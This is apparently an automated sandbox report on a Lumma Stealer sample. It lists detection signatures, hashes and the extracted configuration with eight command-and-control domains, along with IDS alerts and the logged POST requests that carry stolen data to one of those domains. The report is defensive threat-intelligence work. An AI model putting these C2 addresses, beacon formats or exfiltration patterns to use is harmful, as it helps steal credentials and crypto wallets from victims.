Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545111
MD5: 263307cbc603bef82f9365cc2fd70b46
SHA1: 7b6eda920d7b71d23befdaca8a40362c8aadd4cf
SHA256: 5db93dc71e9af5cd5df48dc571a0f7d08430bdcec03292a88928436ae0c75708
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6136 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 263307CBC603BEF82F9365CC2FD70B46)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["thumbystriw.store", "fadehairucw.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2089349102.0000000001646000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2089206820.0000000001642000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: file.exe PID: 6136 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: file.exe PID: 6136 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: file.exe PID: 6136 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T06:16:01.272406+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:02.433640+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:01.272406+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:02.433640+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:00.238748+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:01.952542+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:03.419365+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:04.820527+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:06.125733+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:07.654384+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:09.165357+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:11.282563+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-30T06:15:59.541033+0100 | 2057129 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63250 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.573155+0100 | 2057127 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57736 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.596182+0100 | 2057123 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52480 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.318552+0100 | 2057131 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63113 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.584908+0100 | 2057125 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59597 | 1.1.1.1 | 53 | UDP
2024-10-30T06:16:05.357470+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: file.exe.6136.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "fadehairucw.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source: necklacedmny.store | Virustotal: Detection: 22%
Source: presticitpo.store | Virustotal: Detection: 11%
Source: thumbystriw.store | Virustotal: Detection: 14%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:63113 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:59597 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:57736 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:52480 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:63250 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12840
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15082
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20572
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1247
    Host: necklacedmny.store
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 585622
    Host: necklacedmny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic | DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic | DNS traffic detected: DNS query: necklacedmny.store
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: necklacedmny.store
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089267859.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100311602.000000000163D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/?19
Source: file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/G11
Source: file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/W1
Source: file.exe, file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.0000000001638000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129107930.0000000001632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129236427.0000000001650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129209034.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133401840.0000000001651000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100355676.0000000001652000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api0
Source: file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129236427.0000000001650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api8
Source: file.exe, 00000000.00000002.2133401840.0000000001651000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apiU
Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apiZ
Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apisn
Source: file.exe, 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apix
Source: file.exe, 00000000.00000003.2101201718.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100291812.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073292088.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074182580.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2111114745.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2134598475.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129063200.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073166648.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072961661.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/d
Source: file.exe, 00000000.00000002.2134513001.0000000005D30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/ed
Source: file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/api.default-release/key4.dbPK
Source: file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/apiicrosoft
Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
